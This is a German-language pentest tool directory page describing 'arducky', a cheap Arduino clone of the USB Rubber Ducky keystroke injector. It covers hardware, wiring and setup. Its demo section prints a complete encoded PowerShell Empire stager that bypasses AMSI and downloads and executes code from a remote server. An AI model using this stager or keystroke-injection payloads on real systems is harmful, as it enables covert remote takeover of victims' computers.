Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
arducky — Arducky - Arduino Ducky Skript Interpreter | Kitploit
Tools/GitLabGitLab/creased/arducky
Payload-GenerierungPost-ExploitationHardware-HackingPenetrationstestsRed Teaming
GitLabcreased/arducky

arducky

Arducky - Arduino Ducky Skript Interpreter

Repository anzeigen
12vor 8 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Webseite

Arducky - Arduino Ducky Script Interpreter

Dieses Projekt zielt darauf ab, eine günstige (aber nicht weniger effiziente) Alternative zu Hak5's USB Rubber Ducky zu schaffen.

Einführung

Der USB Rubber Ducky ist ein HID (Human Interface Device), das mit einer einfachen Skriptsprache programmiert werden kann, die es Pentestern ermöglicht, schnell und einfach Sicherheitsaudit-Payloads zu erstellen und einzusetzen, die menschliche Tastatureingaben imitieren.

Mit Arducky musst du dich nur mit Ducky Script befassen, das auf einer MicroSD-Karte gespeichert ist.

Nach der Einrichtung musst du deinen Arduino nicht mehr neu programmieren, um Skripte zu ändern.

Hardware

MengeArtikelPreisBeschreibung
1Arduino Pro Micro ATmega32U4 5V Board$4.11Kompatibel mit USB-Protokoll, kann als HID-Maus oder -Tastatur verwendet werden
1Micro SD Memory Shield$0.78
1Micro USB OTG Adapter$0.99Optional. Kann verwendet werden, um das Micro-USB-Kabel zu ersetzen
1DuPont Wires$1.28
1Micro SD Card$18.00Dies ist ein Beispiel; ich bezweifle, dass du mehr als 1 GB benötigst

Formatierung

Damit deine MicroSD-Karte mit Arducky verwendet werden kann, muss sie im FAT32-Dateisystem formatiert sein.

Ich empfehle dir dringend, deine SD-Karte (selbst wenn sie neu ist!) mit dem offiziellen SD Memory Card Formatter der SDA (SD Association) zu formatieren, anstatt die von deinem Betriebssystem bereitgestellten Formatierungswerkzeuge zu verwenden.

Verdrahtung

Nachdem du deine MicroSD-Karte formatiert hast, lass uns das MicroSD-Shield verdrahten!

Die MicroSD-Controller-Schnittstelle hat insgesamt sechs Pins (GND, VCC, MISO, MOSI, SCK, CS).

Basierend auf der Arduino SPI-Dokumentation muss die Steuerschnittstelle wie folgt verbunden werden (mit DuPont-Kabeln):

arducky_pinout

Hinweis: Wie im Abschnitt Hardwares erwähnt, ist das Modul für die Interaktion mit einem 5V-µC ausgelegt, daher benötigst du den 5V-Pin an deinem Arduino.

arducky_right

arduino_pro_micro

Einrichtung

Klone das Projekt:

root@kitploit:~
git clone https://gitlab.com/Creased/arducky
cd arducky/

Wenn du eine AZERTY-Tastatur verwendest, musst du auch deine Tastaturbibliothek (Keyboard.cpp und Keyboard.h) durch die enthaltene ersetzen.

Lade den Sketch arducky.ino mit der Arduino IDE auf dein Arduino-Board hoch.

Femtoduino

Um die Datei arducky_femto.ino mit einem Ducky Script-Payload zu generieren, kannst du femto_generate_payload.py verwenden:

root@kitploit:~
~# python3 femto_generate_payload.py -h
usage: femto_generate_payload.py [-h] [-i ino_file] [-o output_file]
                                          payload_file

Generates payload in arducky_femto.ino from an input Rubber Ducky payload file

positional arguments:
  payload_file          input Rubber Ducky payload file

optional arguments:
  -h, --help            show this help message and exit
  -i ino_file, --ino ino_file
                        input Arducky ino file
  -o output_file, --out output_file
                        output Arducky ino file

Beispiel:

root@kitploit:~
~# python3 femto_generate_payload.py -i arducky_femto.ino -o femto.ino demo/script.txt

Das Imperium schlägt zurück mit Arducky (Demo)

Empire ist ein Post-Exploitation-Framework, das die Fähigkeit implementiert, PowerShell-Agenten ohne powershell.exe auszuführen, sowie schnell einsetzbare Post-Exploitation-Module, die von Keyloggern bis zu Mimikatz reichen.

In dieser Demo werden wir ein Empire auf einem entfernten Server (z. B. einer VPS) auf einem Docker-Knoten bereitstellen und Arducky verwenden, um darauf zuzugreifen.

Einrichtung

Befolge bitte die in dieser Anleitung beschriebenen Schritte.

Ducky Script

Wenn du ein neues Empire einrichtest, solltest du einen Payload wie den folgenden erhalten (siehe Ordner demo/):

root@kitploit:~
powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQBzAFMARQBNAEIAbAB5AC4ARwBlAHQAVABZAHAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAGUAVABGAEkAZQBsAEQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAFUAZQAoACQAbgBVAEwAbAAsACQAVAByAHUAZQApAH0AOwBbAFMAWQBTAFQARQBNAC4ATgBFAHQALgBTAEUAcgB2AGkAYwBlAFAATwBJAG4AdABNAGEAbgBBAGcARQBSAF0AOgA6AEUAWABwAEUAYwBUADEAMAAwAEMAbwBOAHQAaQBOAFUARQA9ADAAOwAkAHcAYwA9AE4ARQB3AC0ATwBCAEoAZQBDAFQAIABTAFkAUwB0AEUATQAuAE4ARQB0AC4AVwBFAEIAQwBsAGkAZQBuAFQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABXAGMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAHIATwBYAFkAPQBbAFMAeQBTAHQARQBNAC4ATgBFAHQALgBXAGUAQgBSAGUAcQB1AEUAUwBUAF0AOgA6AEQAZQBGAEEAVQBMAHQAVwBlAEIAUABSAG8AWABZADsAJAB3AEMALgBQAHIAbwBYAHkALgBDAHIAZQBEAEUAbgBUAEkAYQBMAFMAIAA9ACAAWwBTAFkAcwBUAEUAbQAuAE4ARQBUAC4AQwByAEUARABFAE4AVABJAEEAbABDAGEAYwBIAEUAXQA6ADoARABFAGYAYQBVAEwAVABOAEUAVAB3AG8AcgBLAEMAcgBlAGQARQBuAHQASQBBAGwAcwA7ACQASwA9AFsAUwBZAHMAdABlAE0ALgBUAEUAWABUAC4ARQBOAEMATwBEAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AEIAeQB0AGUAcwAoACcASwBBAE4AcwAjADgAJQBtAHAAWgBpAGQAUABTAEwAaABhAF0AZwBWAFsAWQAuAEcAPwBuAGsAfQBGAGMALwAzACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAFIARwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAHUATgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAVwBDAC4ASABFAGEARABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0AMgBtADAARQB6AEsALwBlAEEATQBTAE4AbQAxAEIAaABlAEYAUwBEAGYAZAB3AE0AaQBxAFEAPQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvAHYAcABzADIALgBiAG0AbwBpAG4AZQAuAGYAcgA6ADgAMAA4ADAAJwA7ACQAdAA9ACcALwBhAGQAbQBpAG4ALwBnAGUAdAAuAHAAaABwACcAOwAkAGQAQQB0AGEAPQAkAFcAQwAuAEQATwBXAE4AbABvAEEAZABEAGEAdABhACgAJABzAGUAUgArACQAVAApADsAJABJAFYAPQAkAEQAYQB0AEEAWwAwAC4ALgAzAF0AOwAkAGQAYQBUAEEAPQAkAEQAQQB0AEEAWwA0AC4ALgAkAEQAQQB0AGEALgBMAEUATgBnAHQAaABdADsALQBKAG8ASQBOAFsAQwBIAGEAcgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQBUAEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==

Speichere es in einer Datei mit dem Namen stager.txt und führe das Skript create_script.sh aus, um das Ducky Script zu erstellen:

root@kitploit:~
./create_script.sh

Kopiere das generierte script.txt in das Stammverzeichnis deiner MicroSD-Karte und schalte den Arducky ein.

Hier ist ein Video, das den Angriff demonstriert:

Demo video.

Voilà!

arducky_bottom arducky_front arducky_left arducky_top arducky_workbench

Tool herunterladen